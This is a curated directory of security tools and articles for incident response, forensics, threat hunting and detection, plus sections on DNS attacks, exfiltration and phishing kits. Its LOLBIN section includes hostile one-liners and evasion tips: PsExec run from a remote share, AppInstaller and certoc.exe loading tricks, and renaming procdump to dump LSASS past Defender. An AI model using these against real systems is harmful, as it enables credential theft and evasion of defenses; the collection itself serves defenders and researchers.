Detecting CONTI CobaltStrike Lateral Movement Techniques - Part 2 | |||
melting-cobalt | 164 | about 2 years ago | : A Cobalt Strike Scanner that retrieves detected Team Server beacons into a JSON object |
面向iOS攻击的beacon生成 (Beacon generation for iOS attacks) | : command & control on iOS | ||
CSIRT / Pentesting / Purple Team | |||
Purple Cloud | 525 | 10 days ago | : An Infrastructure as Code (IaC) deployment of a small Active Directory pentest lab in the cloud. The deployment simulates a semi-realistic corporate enterprise Active Directory with a DC and endpoints. Purple team goals include blue team detection capabilities and R&D for detection engineering new approaches. On |
PRO TIP when looking through logs on Windows. Use WEVTUTIL.exe | |||
CSIRT / DNS | |||
dnstwist | 4,912 | about 2 months ago | |
Plight At The End Of The Tunnel | |||
dref | 481 | over 3 years ago | : DNS Rebinding Exploitation Framework |
dns-rebind-toolkit | 485 | about 3 years ago | : A front-end JavaScript toolkit for creating DNS rebinding attacks |
Bypass firewalls by abusing DNS history | 1,197 | about 2 years ago | : Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bugbounty hunters |
dnstwist | 4,912 | about 2 months ago | : Domain name permutation engine for detecting typo squatting, phishing and corporate espionage |
Can I take over XYZ? | 4,867 | 7 days ago | : a list of services and how to claim (sub)domains with dangling DNS records |
SubR3con | 18 | over 5 years ago | : is a script written in Python. It uses Sublist3r to enumerate all subdomains of a specific target and then checks the status code of each for possible subdomain takeover vulnerabilities. This works great with Subover.go |
TakeOver-v1 | 101 | over 1 year ago | : script extracts the CNAME records of all subdomains at once. TakeOver saves researcher time and increases the chance of finding a subdomain takeover vulnerability |
subzy | 1,063 | 2 months ago | : Subdomain takeover vulnerability checker |
Subdomain Takeover Scanner | 57 | over 1 year ago | |
subdomain-takeover | 353 | over 1 year ago | : SubDomain TakeOver Scanner by 0x94 |
DNSCrypt | is a protocol that authenticates communications between a DNS client and a DNS resolver. It prevents DNS spoofing. It uses cryptographic signatures to verify that responses originate from the chosen DNS resolver and haven't been tampered with. | ||
pdns-qof | 36 | 3 months ago | : Passive DNS Common Output Format |
dnsdbq | 94 | 14 days ago | : DNSDB API Client, C Version |
CSIRT / DNS / DNS Logging: | |||
How to enable bind query logging to find out Who’s Querying a Name Server | |||
BIND Logging - some basic recommendations | |||
BIND 9 logging best practices | |||
BIND9 Configuration Guide | |||
Thwarting and detecting malware with RPZ and OSSEC | |||
The Importance of DNS Logging in Enterprise Security | |||
CSIRT / DNS | |||
DNSObserver | 188 | about 4 years ago | : A handy DNS service written in Go to aid in the detection of several types of blind vulnerabilities. It monitors a pentester's server for out-of-band DNS interactions and sends lookup notifications via Slack |
Unbound DNS Blacklist | |||
subjack | 1,911 | over 1 year ago | : Subdomain Takeover tool written in Go |
sad dns | : The attack allows an off-path attacker to inject a malicious DNS record into a DNS cache (e.g., in BIND, Unbound, dnsmasq) | ||
dog | 6,179 | 6 months ago | : Command-line DNS client |
NtHiM | 355 | over 1 year ago | : Now, the Host is Mine! - Super Fast Sub-domain Takeover Detection! |
Passive DNS - Common Output Format | 36 | 3 months ago | |
DNS loophole makes nation-state level spying as easy as registering a domain | |||
CSIRT / Exfiltration | |||
Script for searching the extracted firmware file system for goodies! | 1,057 | about 1 year ago | |
DKMC - Dont kill my cat | 1,377 | over 4 years ago | : Malicious payload evasion tool |
Tunna | 1,241 | about 2 years ago | is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments |
gitleaks | 17,964 | 17 days ago | : Searches full repo history for secrets and keys |
Twitter Scraper | 3,936 | about 1 year ago | |
tinfoleak | : The most complete open-source tool for Twitter intelligence analysis | ||
Social IDs | 12 | almost 8 years ago | : Get user ids from social network handlers |
SpookFlare | 946 | over 5 years ago | : Meterpreter loader generator with multiple features for bypassing client-side and network-side countermeasures |
Photon | 11,067 | 3 months ago | : Incredibly fast crawler which extracts urls, emails, files, website accounts and much more |
Extracting data from an EMV (Chip-And-Pin) Card with NFC technology | |||
accountanalysis | : This tool enables you to evaluate Twitter accounts. For example how automated they are, how many Retweets they post, or which websites they link to most often | ||
How to get authentication key from SNMPv3 packets | |||
AtomicTestsCommandLines.txt | : Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon | ||
whois (GTFOBins) | : hangs waiting for the remote peer to close the socket. GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems | ||
ssh-keygen can be used to load shared libraries | |||
Browsers affected by the History API DoS | |||
PacketWhisper | : Stealthily exfiltrate data and defeat attribution using DNS queries and text-based steganography. Avoid the problems associated with typical DNS exfiltration methods. Transfer data between systems without the communicating devices directly connecting to each other or to a common endpoint. No need to control a DNS Name Server | ||
Using Google Analytics for data extraction | |||
Exfiltrating credentials via PAM backdoors & DNS requests | |||
Building simple DNS endpoints for exfiltration or C&C | |||
CheckPlease | 898 | over 3 years ago | : Sandbox evasion modules written in PowerShell, Python, Go, Ruby, C, C#, Perl, and Rust |
okhttp-peer-certificate-extractor | 79 | over 8 years ago | : This tool extracts peer certificates from given certificates |
DET | 820 | about 7 years ago | : (extensible) Data Exfiltration Toolkit (DET) |
awesome-python-login-model | 15,938 | over 2 years ago | : login access for web scraping |
Hamburglar | 316 | almost 2 years ago | : collect useful information from urls, directories, and files |
Giggity | 126 | over 1 year ago | : grab hierarchical data about a github organization, user, or repo |
Living Off The Land Binaries and Scripts (and also Libraries) | |||
Windows TCPIP Finger Command | : C2 Channel and Bypassing Security Software | ||
Living Off Windows Land – A New Native File “downldr” | |||
Ttdinject.exe | : Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe) | ||
Exfiltrate Like a Pro | : Using DNS over HTTPS as a C2 Channel | ||
Awesome Asset Discovery | 1,990 | 6 months ago | : List of Awesome Asset Discovery Resources |
Cloakify-Factory | : A data exfiltration tool that uses text-based steganography. Data exfiltration & infiltration in plain sight; convert any filetype into a list of everyday strings using text-based steganography; evade DLP/MLS devices, defeat data whitelisting controls, social engineering of analysts, evade AV detection | ||
hakrawler | 4,502 | 10 months ago | : Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application |
Chameleon | 459 | about 2 years ago | : A tool for evading Proxy categorisation |
DNSExfiltrator | 847 | 7 months ago | : Data exfiltration over DNS request covert channel |
Data Exfiltration using Linux Binaries | |||
Exploring the WDAC Microsoft Recommended Block Rules: kill.exe | (lolbin/lolbas) | ||
Desperate downloader: MSOXMLED.EXE | |||
CSIRT / Exfiltration / LOLBIN/LOLBAS: | |||
I found a way to download arbitrary files with AppInstaller.exe (signed by MS). start ms-appinstaller://?source= | lolbin/lolbas | ||
C:\Windows\System32\Cmdl32.exe | |||
I shot the sigverif.exe – the GUI-based LOLBin | |||
\http://live.sysinternals.com\tools\PsExec.exe -s -c cmd.exe | |||
Need to download mimikatz (or some other nasty stuff) without alerting Windows Defender Antivirus? | |||
C:\Windows\System32\WorkFolders.exe | |||
C:\Windows\System32\certoc.exe -LoadDLL | |||
if you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio*" folder, you can bypass Defender and dump LSASS. | |||
CSIRT / Exfiltration | |||
Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service | |||
Living off the land | |||
It's not a forgotten legacy code, it's recidivism | : tpmtool drivetracing | ||
Python Keylogger Using Mailtrap.io | |||
CSIRT / Exfiltration / Steganography | |||
A list of useful tools and resources | |||
steghide | 593 | 9 months ago | : is a steganography program that is able to hide data in various kinds of image- and audio-files |
stegsolve | 650 | over 3 years ago | |
Unicode Text Steganography Encoders/Decoders | |||
StegCracker | 554 | almost 4 years ago | : Steganography brute-force utility to uncover hidden data inside files |
Simple Image Steganography in Python | |||
How To Hide Data in Images Using Python | |||
Aperi'Solve | is an online platform which performs layer analysis on images. The platform also uses zsteg, steghide, outguess, exiftool, binwalk, foremost and strings for deeper steganography analysis | ||
Stegseek | 1,034 | about 1 year ago | : World's fastest steghide cracker, chewing through millions of passwords per second |
CSIRT / Phishing | |||
Phishing on Twitter | 251 | over 6 years ago | |
evilginx2 | 10,924 | 3 months ago | : Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication |
shellphish | : Phishing Tool for 18 social media: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest | ||
pompa | 49 | 11 months ago | : Fully-featured spear-phishing toolkit - web front-end |
Modlishka | 4,847 | 7 months ago | : Modlishka is a flexible and powerful reverse proxy, that will take your phishing campaigns to the next level (with minimal effort required from your side) |
Using phishing tools against the phishers | — and uncovering a massive Binance phishing campaign | ||
Lure | 158 | over 1 year ago | : User Recon Automation for GoPhish |
PhishingKitTracker | : An extensible and freshly updated collection of phishingkits for forensics and future analysis topped with simple stats | ||
SimplyTemplate | 162 | almost 7 years ago | : Phishing Template Generation Made Easy |
Compromising operating systems through fake software updates | . Using: is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates | ||
MurmurHash | 114 | about 1 year ago | : This little tool is to calculate a MurmurHash value of a favicon to hunt phishing websites on the Shodan platform |
SniperPhish | 540 | 7 months ago | : The Web-Email Spear Phishing Toolkit |
King Phisher | 2,269 | 4 months ago | : Phishing Campaign Toolkit |
phishing-frenzy | 794 | about 1 year ago | : Ruby on Rails Phishing Framework |
gophish | 11,675 | 2 months ago | : |
Phishing 101: why depend on one suspicious message subject when you can use many? | |||
Widespread credential phishing campaign abuses open redirector links | |||
ThePhish | 1,154 | 4 months ago | : an automated phishing email analysis tool |
CSIRT / Forensics | |||
Cracking Linux Full Disk Encryption (LUKS) with hashcat - The Forensic way! | |||
O-Saft | 373 | 5 days ago | : OWASP SSL advanced forensic tool |
PcapXray | 1,698 | over 2 years ago | A Network Forensics Tool - To visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction |
swap_digger | 513 | over 3 years ago | is a tool used to automate Linux swap analysis during post-exploitation or forensics |
The Sleuth Kit® (TSK) | 2,630 | 7 days ago | is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data |
Invoke-LiveResponse | 145 | almost 3 years ago | |
Linux Forensics | |||
CDQR | 334 | over 2 years ago | : The Cold Disk Quick Response (CDQR) tool is a fast and easy to use forensic artifact parsing tool that works on disk images, mounted drives and extracted artifacts from Windows, Linux and MacOS devices |
mac_apt | 781 | about 1 month ago | : macOS Artifact Parsing Tool |
MacForensics | 179 | 4 months ago | : Repository of scripts for processing various artifacts from macOS (formerly OSX) |
imago-forensics | 249 | almost 3 years ago | : Imago is a python tool that extracts digital evidence from images |
remedi-infrastructure | 4 | almost 6 years ago | : setup and deployment code for setting up a REMEDI machine translation cluster |
Tsurugi Linux | is a new DFIR open source project that is and will be totally free, independent without involving any commercial brand | ||
libelfmaster | 410 | 17 days ago | : Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools |
usbrip | 1,154 | about 2 years ago | (derived from "USB Ripper", not "USB R.I.P." 😲) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines |
Digital Forensics and Incident Response | : This post is inspired by all the hard working DFIR, and more broadly security professionals, who have put in the hard yards over the years to discuss in depth digital forensics and incident response | ||
KAPE | Kroll Artifact Parser And Extractor: Find, collect and process forensically useful artifacts in minutes. . and | ||
AVML | 875 | 10 days ago | (Acquire Volatile Memory for Linux) |
turbinia | 750 | 7 days ago | : Automation and Scaling of Digital Forensics Tools |
Eric Zimmerman's Tools | |||
MacQuisition | : A powerful, 4-in-1 forensic imaging software solution for Macs for triage, live data acquisition, targeted data collection, and forensic imaging | ||
Kuiper | 769 | about 1 month ago | : Digital Forensics Investigation Platform |
file Signatures | : | ||
PowerForensics | 1,385 | about 1 year ago | : PowerForensics provides an all in one platform for live disk forensic analysis |
OfficeForensicTools | 26 | over 4 years ago | : A set of tools for collecting forensic information |
FBI Electronic Tip For | |||
CHIRP | 1,043 | over 3 years ago | : A forensic collection tool written in Python |
Hash Cracking with AWS and hashcat | |||
Hashcat new feature: autodetect hash-mode | |||
L0phtCrack | is a password auditing and recovery application originally produced by Mudge from L0pht Heavy Industries. It is used to test password strength and sometimes to recover lost Microsoft Windows passwords, by using dictionary, brute-force, hybrid attacks, and rainbow tables | ||
Foremost | 317 | over 1 year ago | : is a console program to recover files based on their headers, footers, and internal data structures. This process is commonly referred to as data carving. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. The headers and footers can be specified by a configuration file or you |
TrID | : is a utility designed to identify file types from their binary signatures. While there are similar utilities with hard coded logic, TrID has no fixed rules. Instead, it's extensible and can be trained to recognize new formats in a fast and automatic way | ||
image-unshredding | 607 | about 8 years ago | : Image unshredding using a TSP solver |
Linux Incident Response Guide | |||
FastIR Artifacts | 160 | 5 months ago | : Live forensic artifacts collector |
MVT | 10,416 | 22 days ago | (Mobile Verification Toolkit) helps conduct forensics of mobile devices in order to find signs of a potential compromise |
Cloud Forensics Triage Framework (CFTF) | |||
Forensic Investigation | Cisco Stealthwatch at work | ||
Andriller CE (Community Edition) | 1,343 | over 2 years ago | : is a software utility with a collection of forensic tools for smartphones. It performs read-only, forensically sound, non-destructive acquisition from Android devices |
Dshell | 5,454 | 7 months ago | is a network forensic analysis framework |
exif-gps-tracer | 41 | almost 4 years ago | : A python script which allows you to parse GeoLocation data from your image files stored in a dataset. It also produces output as a CSV file and as HTML Google Maps |
CSIRT / Forensics / Anti-Forensics: | |||
ShredOS x86_64 - Disk Eraser | 1,506 | 2 months ago | : for all Intel 64 bit processors as well as processors from AMD and other vendors which make compatible 64 bit chips. ShredOS - Secure disk erasure/wipe |
CSIRT / Forensics | |||
dfir_ntfs | 191 | 15 days ago | : An NTFS/FAT parser for digital forensics & incident response |
MemProcFS | 3,115 | 7 days ago | : is an easy and convenient way of viewing physical memory as files in a virtual file system |
LeechCore | 522 | about 1 month ago | : Physical Memory Acquisition Library & The LeechAgent Remote Memory Acquisition Agent |
PCILeech | 5,011 | 12 days ago | : Direct Memory Access (DMA) Attack Software |
CSIRT / Forensics / PDF | |||
PDF Tools | |||
peepdf | 1,309 | 3 months ago | : Powerful Python tool to analyze PDF documents |
How to Protect Files With Canary Tokens | |||
Attacks on PDF Certification | |||
How to remove malicious code from PDF files | |||
mu tools | |||
PDF forensics with Kali Linux : pdfid and pdfparser | |||
How can I extract a JavaScript from a PDF file with a command line tool? | |||
Insecure Features in PDFs. | |||
Shadow Attacks … the smallest attack vector ever | |||
CSIRT / Forensics / Email Headers | |||
Configuring MTA-STS and TLS Reporting For Your Domain | |||
Google Admin Toolbox | |||
Azure Message Header Analyzer | |||
CSIRT / Forensics / Distros | |||
CAINE | : Computer Aided INvestigative Environment. Is an Italian GNU/Linux live distribution created as a Digital Forensics project | ||
e-Fense Helix 3 | |||
black arch | : An ArchLinux based distribution for penetration testers and security researchers | ||
List of Live Distributions for Computer Forensics | |||
CSIRT / Forensics / Volatility | |||
volatility | 7,343 | over 1 year ago | : An advanced memory forensics framework |
Volatility profiles for Linux and Mac OS X | 318 | about 2 years ago | |
Building a profile for Volatility | |||
OROCHI | 225 | 7 days ago | : The Volatility Collaborative GUI |
AutoVolatility | 108 | about 2 years ago | : Run several volatility plugins at the same time |
Memory Forensics and Analysis Using Volatility | |||
Volatility, my own cheatsheet (Part 1): Image Identification | |||
First steps to volatile memory analysis | |||
MemLabs | 1,659 | over 3 years ago | : Educational, CTF-styled labs for individuals interested in Memory Forensics |
CSIRT / Blue Team / MITRE ATT&CK: | |||
ATTACK-Tools | 1,012 | 6 months ago | : Utilities for MITRE™ ATT&CK |
Analyzing threats with Mitre ATT&CK Navigator | (pt-br) | ||
ATT&CK™ Navigator | : Web app that provides basic navigation and annotation of ATT&CK matrices | ||
Atomic Threat Coverage | 972 | over 2 years ago | : Actionable analytics designed to combat threats based on MITRE's ATT&CK |
atomic-red-team | 9,811 | 1 day ago | : Small and highly portable detection tests based on MITRE's ATT&CK |
Welcome to Stealthbits Attack Catalog | : Adversary techniques for credential theft and data compromise | ||
Splunk Attack Range | 2,162 | 16 days ago | : A tool that allows you to create vulnerable instrumented local or cloud environments to simulate attacks against and collect the data into Splunk |
attack-scripts | 581 | 12 months ago | : Scripts and a (future) library to improve users' interactions with the ATT&CK content |
Windows-specific MITRE ATT&CK techniques application control prevention assessment. | This is a first attempt to assess the extent to which application control solutions would mitigate/prevent attack techniques. Note: this highly subjective assessment assumes a system that enforces an application control solution that at a minimum allows all Windows-signed code to execute and any line of business applications. It does not make assumptions about blocking built-in abusable applications | ||
Data Sources, Containers, Cloud, and More: What’s New in ATT&CK v9? | |||
EU MITRE ATT&CK® Community | |||
Mitre Att&ck Matri | 18 | over 3 years ago | |
Best Practices for MITRE ATT&CK® Mapping | |||
CSIRT / Blue Team | |||
MITRE D3FEND | |||
DeTTECT | 2,066 | 15 days ago | : Detect Tactics, Techniques & Combat Threats |
CSIRT / Blue Team / Sysmon: | |||
Profile Sysmon logs to discover which LOLBAS binaries have run and what their command line arguments were | |||
Sysmon 12.0 — EventID 24 | : is out, with a new event ID: number 24. A very useful new feature, clipboard monitoring | ||
SysmonX | 210 | about 5 years ago | : An Augmented Drop-In Replacement of Sysmon |
SysmonSimulator | 833 | almost 3 years ago | : Sysmon event simulation utility which can be used to simulate the attacks to generate the Sysmon Event logs for testing the EDR detections and correlation rules by Blue teams |
CSIRT / Blue Team | |||
Awesome Honeypots | 8,661 | 3 months ago | : A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects |
T-Pot | 6,855 | 8 days ago | : The All In One Honeypot Platform  |
Blue Team Fundamentals | |||
Blue Team fundamentals Part Two | : Windows Processes | ||
Sooty | 1,352 | about 2 months ago | : The SOC Analysts all-in-one CLI tool to automate and speed up workflow |
Your detections aren't working | |||
elastalert | 8,000 | 4 months ago | : Easy & Flexible Alerting With ElasticSearch |
Technical Approaches to Uncovering and Remediating Malicious Activity | : Alert (AA20-245A) | ||
EVTX-ATTACK-SAMPLES | 2,252 | almost 2 years ago | : Windows Events Attack Samples |
Windows Advanced Audit Policy Map to Event IDs | |||
takuan | 84 | over 3 years ago | is a system service that parses logs and detects noisy attackers in order to build a blacklist database of known cyber offenders |
CobaltStrikeScan | 900 | over 3 years ago | : Scan files or process memory for CobaltStrike beacons and parse their configuration |
Hunting and detecting Cobalt Strike | |||
Cobalt Strike Beacon Analysis | . python decoder: | ||
How to Design Detection Logic - Part 1 | |||
Mitigating Pass-the-Hash and Other Credential Theft | |||
Evilginx-ing into the cloud: How we detected a red team attack in AWS | |||
Hidden Shares as bait | |||
Blue Team 201: Detection | — Where Do You Start? | ||
The DML model | |||
Data Sources, Containers, Cloud, and More: What’s New in ATT&CK v9? | |||
hashlookup CIRCL API | |||
BaselineTraining | 12 | over 5 years ago | : Notes from my "Implementing a Kick-Butt Training Program: Blue Team GO!" talk |
Practical Training for Blue Teamers | |||
BLUE TEAM LABS ONLINE | |||
Defining Cobalt Strike Components So You Can BEA-CONfident in Your Analysis | |||
There are a lot of ways that folks distinguish between blue team roles. My focus is on investigative work and cognitive skills, so I divide those roles into the mental model shown in this diagram. | |||
CSIRT / Blue Team / Threat Hunting | |||
Wireshark For Network Threat Hunting: Creating Filters - Active Countermeasures | |||
Comprehensive Threat Intelligence | Talos Blog || Cisco Talos Intelligence Group - : Adwind Dodges AV via DDE | ||
strelka | 882 | about 1 month ago | : Scanning files at scale with Python and ZeroMQ |
Threat-Hunting | 255 | almost 6 years ago | : Personal compilation of APT malware from whitepaper releases, documents and own research |
ThreatHunter-Playbook | 4,030 | 9 months ago | : A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns |
HELK | : The Hunting ELK or simply the HELK is one of the first open source hunt platforms with advanced analytics capabilities such as SQL declarative language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark over an ELK stack | ||
mordor | 1,605 | 8 months ago | : Re-play Adversarial Techniques |
ioc_writer | 200 | over 1 year ago | : Provide a python library that allows for basic creation and editing of OpenIOC objects |
3 of the main observed false positives I've learned while hunting for cmd.exe as a child proc of rundll32.exe (still one of the top 3 pref host for backdoors implemented as dll or alike) #threathunting (understanding this kind of FPs is as important as learning new/old TTPs traces) | . For #redteam u can blend in with mimicking case1 by naming ur module something like MSI*.tmp and using similar export fct name (dll path usually under c:\users* so no high priv needed) | ||
thethe | : Simple, shareable, team-focused and expandable threat hunting environment | ||
CSIRT / Blue Team / Threat Hunting / Mordor PCAPs 📡: | |||
Capturing Network Packets from Windows Endpoints with Network Shell (Netsh) ⚔️ and Azure Network Watcher 🌩 | Part 1: | ||
CSIRT / Blue Team / Threat Hunting | |||
cyber-threat-response-clinic | 4 | 6 days ago | |
opencti | : | ||
securityonion | 3,293 | 4 days ago | : Security Onion 2.0 (Pre-release) - Linux distro for threat hunting, enterprise security monitoring, and log management |
TheHive | 3,446 | almost 2 years ago | : a Scalable, Open Source and Free Security Incident Response Platform |
TheHive4py | 218 | 11 days ago | : Python API Client for TheHive |
TheHiveIRPlaybook | 12 | over 4 years ago | is a collection of TheHive case templates used for Incident Response |
Cortex-Analyzers | 434 | 14 days ago | : Cortex Analyzers Repository |
Nimbus Network | Traffic Analyzer Augmented with our world-class threat intelligence | ||
ja3 | 2,775 | about 1 year ago | is a standard for creating SSL client fingerprints in an easy to produce and shareable way |
Threat Hunting Process | 5 | over 4 years ago | |
Threat Hunting Principles | 372 | almost 2 years ago | |
TypeDB CTI | 145 | about 1 year ago | : |
API-To-Event | 75 | about 5 years ago | Some repos from hunters-forge: , , |
Yeti | 1,745 | 7 days ago | : |
Watcher | 862 | 15 days ago | : Open Source Cybersecurity Threat Hunting Platform. Developed with Django & React JS |
CSIRT / Blue Team / Threat Hunting / Network Analysis: | |||
traffic-analysis-workshop | 78 | about 3 years ago | and |
Wireshark Tutorial: Exporting Objects from a Pcap | |||
Hex Packet Decoder | : Hex Packet Decoder provides an for you to parse network packets | ||
Packetor | : Packetor is an online hex-dump packet analyzer / decoder | ||
Termshark | : , inspired by Wireshark | ||
Wireshark Tutorial: Wireshark Workshop Videos Now Available | |||
Wireshark Tutorial: Decrypting HTTPS Traffic | |||
CSIRT / Blue Team / Threat Hunting | |||
Lookup Before You Go-Go...Hunting | |||
Insider Threat Hunting | and | ||
Wazuh | : is a free, open source and enterprise-ready security monitoring solution for threat detection, integrity monitoring, incident response and compliance. and | ||
Hunting the Hunters - RCE in Covenant C2 | |||
Passive SSH | : Passive SSH is an open source framework composed of a scanner and server to store and lookup the SSH keys and fingerprints per host (IPv4/IPv6/onion). repo: | ||
EVTX-ATTACK-SAMPLES | 2,252 | almost 2 years ago | : Windows Events Attack Samples |
Cyber Threat Intelligence | |||
Cloud Threat Hunting: Attack & Investigation Series- Lateral Movement – Under the Radar | |||
D4 core | 43 | 11 months ago | : D4 core software (server and sample sensor client) |
A Top 10 Reading List if You’re Getting Started in Cyber Threat Intelligence | |||
CTI SquadGoals | — Setting Requirements | ||
Threat Intelligence Naming Conventions: Threat Actors, & Other Ways of Tracking Threats | |||
BeaconEye | 885 | 3 months ago | : Hunts out CobaltStrike beacons and logs operator command output |
Datafeeds/API | SANS DShield | ||
The State of Threat Hunting and the Role of the Analyst | |||
Deepfence ThreatMapper | 4,845 | about 4 hours ago | : Identify vulnerabilities in running containers, images, hosts and repositories |
SQUIRRELWAFFLE Leverages malspam to deliver Qakbot, Cobalt Strike | |||
All Access Pass: Five Trends with Initial Access Brokers | |||
Paint it, Blue - Transitioning from CTI to HUNT | 13 | over 1 year ago | : Ekoparty's BlueSpace Keynote November 2021. Shoutout to @plugxor, many thanks!!! |
Interesting large and small malspam attachments from 2023 | |||
MISP (core software) | 5,387 | 6 days ago | Open Source Threat Intelligence Platform (formerly known as Malware Information Sharing Platform) |
MISP galaxy | 531 | 7 days ago | : Clusters and elements to attach to MISP events or attributes (like threat actors) |
DigitalSide Threat-Intel | 148 | about 1 month ago | : Threat-Intel repository |
MISP-sizer | 11 | over 6 years ago | : Sizing your MISP instance |
MISP RPM | 34 | about 1 month ago | : RPM packages for MISP |
ansible MISP | 52 | 11 days ago | : ansible role to setup MISP, Malware Information Sharing Platform & Threat Sharing |
MISP CERT.br | |||
misp-warninglist | 532 | 11 days ago | : Warning lists to inform users of MISP about potential false-positives or other information in indicators |
MISP-maltego | 170 | 5 months ago | : Set of Maltego transforms to interface with a MISP Threat Sharing instance, and also to explore the whole MITRE ATT&CK dataset |
misp-modules | 345 | 4 days ago | : Modules for expansion services, import and export in MISP |
misp-taxonomies | 264 | 4 days ago | : Taxonomies used in the MISP taxonomy system, which can also be used by other information sharing tools |
PyMISP | 445 | 7 days ago | : Python library using the MISP Rest API |
MISP Concepts Cheat sheet | |||
CyCAT.org API services | 30 | almost 2 years ago | : API back-end server including crawlers |
teslacoil.py | : Monitors some log files and send new entries to syslog | ||
CSIRT / Blue Team / Threat Hunting / Tutorials: | |||
MISP Training - Youtube CIRCL | |||
Youtube CIRCL | |||
PyMISP and MISP Objects: a door to new opportunities | |||
Additional MISP training materials (including slides, documentation and videos) | 389 | about 1 month ago | |
Additional MISP training materials for law-enforcement agencies | 31 | about 1 year ago | |
CSIRT / Blue Team / Threat Hunting | |||
More than a Dozen Obfuscated APT33 Botnets Used for Extreme Narrow Targeting | APT33: . . | ||
Dismantling a fileless campaign: Microsoft Defender ATP’s Antivirus exposes Astaroth attack | |||
Adversary Reports | : The latest whitepapers, solution briefs, and datasheets from Dragos | ||
APT29 targets COVID-19 vaccine development | |||
What is APT28's Drovorub Malware? | |||
Dispatches from Drovorub: Network Threat Hunting for Russia GRU GTsSS' Malware at Scale | |||
Tracking A Malware Campaign Through VT | |||
More Evidence of APT Hackers-for-Hire Used for Industrial Espionage | |||
US Charges Five Alleged Members of APT41 Group | APT41: | ||
Analysis Report (AR20-268A) | |||
Cyber Planning for Response and Recovery Study | CYPRESS - 2020 FERC, NERC and REs Report | ||
TA505 | CHIMBORAZO | ||
A Threat Actor Encyclopedia | Threat Group Cards: | ||
Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor | . , symantec: . SunBurst_DGA_Decode | ||
SolarWinds Security Advisory | |||
If you work in a SOC, print out this screenshot & pin it to a wall in your office | |||
Customer Guidance on Recent Nation-State Cyber Attacks | |||
Mapping out AridViper Infrastructure Using Augury’s Malware Module | |||
The Story of Jian | : How APT31 Stole and Used an Unknown Equation Group 0-Day | ||
APT Encounters of the Third Kind | |||
Lazarus APT conceals malicious code within BMP image to drop its RAT | found new | ||
distribute malicious zip with lnk? MSHTA > wscript > new LNK in startup > Reboot > MSHTA > wscript. | |||
Analysis of the Iranian cyber attack landscape | |||
Lemon Duck spreads its wings | : Actors target Microsoft Exchange servers, incorporate new TTPs | ||
threat actor touching an endpoint | |||
China’s PLA Unit 61419 Purchasing Foreign Antivirus Products, Likely for Exploitation | |||
APTnotes | 1,658 | 4 months ago | is a repository of publicly-available papers and blogs (sorted by year) related to malicious campaigns/activity/software that have been associated with vendor-defined APT (Advanced Persistent Threat) groups and/or tool-sets |
The Active Adversary Playbook 2021 | : Attacker behaviors, tactics, techniques and procedures (TTPs) | ||
An Update on Industrialize the Tracking of Botnet Operations | |||
Patchwork APT caught in its own web | |||
Armagedon/Gamaredon | |||
North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign | |||
Update on cyber activity in Eastern Europe | |||
Cisco Talos shares insights related to recent cyber attack on Cisco | |||
Operation Triangulation: The last (hardware) mystery | |||
CSIRT / Blue Team / IoCs | |||
sophos labs IoCs | 545 | 17 days ago | : Sophos-originated indicators-of-compromise from published |
DailyIOC | 310 | 12 months ago | : IOC from articles, tweets for archives |
CVE-2020-1472 Zerologon IoCs | |||
iocs | 702 | about 1 month ago | : Indicators from Unit 42 Public Reports |
Threat intelligence and threat detections | 53 | almost 4 years ago | : Threat intelligence and threat detection indicators (IOC, IOA) |
APT_Digital_Weapon | 896 | 3 months ago | : Indicators of compromise (IOCs) collected from public resources and categorized by Qi-AnXin |
Ryuk Speed Run, 2 Hours to Ransom | |||
What did DeathStalker hide between two ferns? | |||
Yikes, Microsoft have signed multiple rootkits (which allow kernel drivers) and reach out to a remote IP | |||
Netfilter Rootkit Samples | |||
Feodo Tracker | tracks certain families that are related or that evolved from Feodo | ||
There are evil packages on the npm registry that deploy XMRIG | |||
Emotet 2022 | epoch4 | 22.04.2022 | | 55 | over 1 year ago | |
238 Cobalt Strike stage 2 IP's, with 238 unique configurations, identified today. | |||
malware-IoC | 14 | about 1 year ago | : Welcome to the official IoC repository of the Entel Cyber Secure Cyber Threat Intelligence team |
IcedID | 31.08.2022 | Campaign 2786525712 | 34 | 12 months ago | |
CSIRT / Blue Team / SIEM | |||
Sigma | 8,371 | 8 days ago | : Generic Signature Format for SIEM Systems |
CSIRT / Blue Team / SIEM / Sigma | |||
Suspicious Use of Procdump | 8,371 | 8 days ago | : Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable |
KrbRelayUp local privilege escalation. | 115 | 2 months ago | |
CSIRT / Blue Team / SIEM | |||
Events Heatmap | |||
RedELK | 2,383 | 2 months ago | : Red Team's SIEM - easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations |
plaso | 1,734 | about 1 month ago | : Super timeline all the things |
Heatmaps Make Ops Better | |||
graylog-guide-snort | 27 | about 1 year ago | : How to send structured Snort IDS alert logs into Graylog |
TALR | 89 | almost 6 years ago | : Threat Alert Logic Repository |
Auditing Continuously vs. Monitoring Continuously | |||
